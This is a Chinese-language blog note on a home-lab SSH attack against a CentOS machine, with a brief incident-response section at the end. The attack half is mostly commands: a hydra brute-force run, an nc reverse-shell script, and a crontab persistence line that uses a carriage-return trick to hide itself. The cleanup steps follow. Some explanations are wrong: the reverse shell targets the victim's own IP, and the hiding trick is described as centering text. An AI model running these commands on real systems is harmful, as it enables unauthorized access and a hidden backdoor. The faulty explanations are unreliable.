SSH爆破攻击及应急响应/事件处置

提示：本文是我做的笔记，有问题可以留言

---

前言

提示：这里可以添加本文要记录的大概内容：

随着互联网的不断发展，网络安全越来越得到重视了…实在是编不下去了，就是想随便写一个开头，就没了。

---

提示：以下是本篇文章正文内容，下面案例可供参考

一、什么是SSH？

ssh(安全外壳协议)(secure shell),是一种加密的网络传输协议，可以在不安全的网络环境中提供安全的传输环境，ssh通过在网络中创建安全隧道来实现ssh客户端与服务端之间的连接，ssh最常见的用途是远程登陆系统，ssh使用率最高的场合是unix系统

二、开始前的准备

攻击机：2023.1？

目标机：cent os7

1.扫描

让我们扫描，192.168.0.147,ip地址

我们发现他开放22，80端口，我么先不管80端口就先攻击一下22端口。

2.准备爆破

hydra -L /home/kali/Desktop/user.txt -P /home/kali/Desktop/pas.txt -f -vV ssh://192.168.0.147
1

-L file 大写，指定用户的用户名字典
-P file 大写，用于指定密码字典。
-v / -V 显示详细过程
-f 找到第一对登录名或者密码的时候中止破解。
我们创建两个简单的字典文件


准备好字典后按下回车

出来了用户名是Neatsuki,密码是2468admin，当然我是不会设置这么简单的密码的，本文章完成后我会换密码的，

3.准备ssh登录

ssh Neatsuki@192.168.0.147
1

Neatsuki是你爆破出来的用户名，@是登陆在，192.168.0.147是你要登陆的IP/主机

这里要输入yes，不然登陆不进去

输入爆破出来的密码

成功登录，

提示符一样，这代表我们成功了

登陆后的准备

我们经历了千辛万苦，百般阻挠，终于登陆了cent os系统，但是他一旦关机或换密码，我们的努力就都白费了，所以我们要建一个跟后门差不多的东西，来权限维持。
输入vim san.sh
san你可以换掉名字随便取

#！/bin/bash
nc 192.168.0.147 7777 -e /bin/bash
1
2

这个就是nc反弹，是一个Bash脚本，它使用nc命令（也称为netcat）来连接到IP地址为192.168.0.147的计算机的7777端口。一旦连接成功，它将打开一个交互式的Bash shell，允许用户在远程计算机上执行任意命令。这个脚本的作用类似于一个远程控制工具，可以被恶意攻击者用来入侵和控制远程计算机。
让我们，来看一下它的权限

ls -l san.sh
1

现在是可读可写状态所以，我们要给予他神圣的权力(权限)

chmod +x san.sh
1

输入完这条命令，就会发现还和以前一样，不不不，在输入这条指令，我们要查看它的权力(权限)

ls -l san.sh
1

可以看到，多了一个字母X,我们已经授予它可执行的权限了。
然后，一个大臣还不够在招一个一个大臣
输入

vim aaa.sh
1

跟那个一样名字随便写

(crontab -l;printf "* * * * * /tmp/san.sh;\rno crontw-wab for 'whoami'%100c\n")|crontab -
1

另外一个大臣的作用：将一个名为san.sh的脚本文件添加到当前用户的crontab中，并在每分钟执行一次该脚本文件。同时，它会在添加完crontab后输出一段文本，提示当前用户没有crontab的写入权限。

具体来说，这条命令使用了管道符（|）将两个命令串联在一起。第一个命令是crontab -l，它会列出当前用户的crontab内容。第二个命令使用printf函数向标准输出流中输出一段文本，其中包含了一个将光标向右移动100个字符的转义序列（%100c）。这个转义序列的作用是让输出的文本在终端中居中显示。

最后，管道符将第一个命令的输出作为第二个命令的输入，将文本输出到终端中。
我们也要给他权限，

chmod +x aaa.sh
1

nc反弹

nc -lvp 7777
1

作用：这是一个用于监听网络连接的命令，具体含义如下：

• nc：是一个网络工具，用于在网络上进行数据传输和调试。
• -l：表示监听模式，即等待其他计算机连接。
• -v：表示启用详细模式，输出更多的信息。
• -p：表示指定端口号。
• 7777：表示监听的端口号。

因此，运行该命令后，计算机会开始监听 7777 端口，等待其他计算机连接。如果有其他计算机连接到该端口，该命令会将连接的数据输出到终端上。

应急响应/事件处置

啊，这是蓝队应该看的，你们看啥，适可而止啊

1.查看网络连接情况

netstat -antpl
1

发现异常连接

2.查看守护进程

查看进程树：

pstree -p
1

查看进程：

systemctl status 3076
1

存在异常连接

3.删除，结束异常后门

删除恶意文件

crontab -r -u root
1

杀掉进程

kill 28377
1

删除文件

rm aaa.sh
rm san.sh
1
2

4.修改密码

passwd 密码
1

---

总结

本文就是很简单地讲解了ssh爆破和防御，

THE END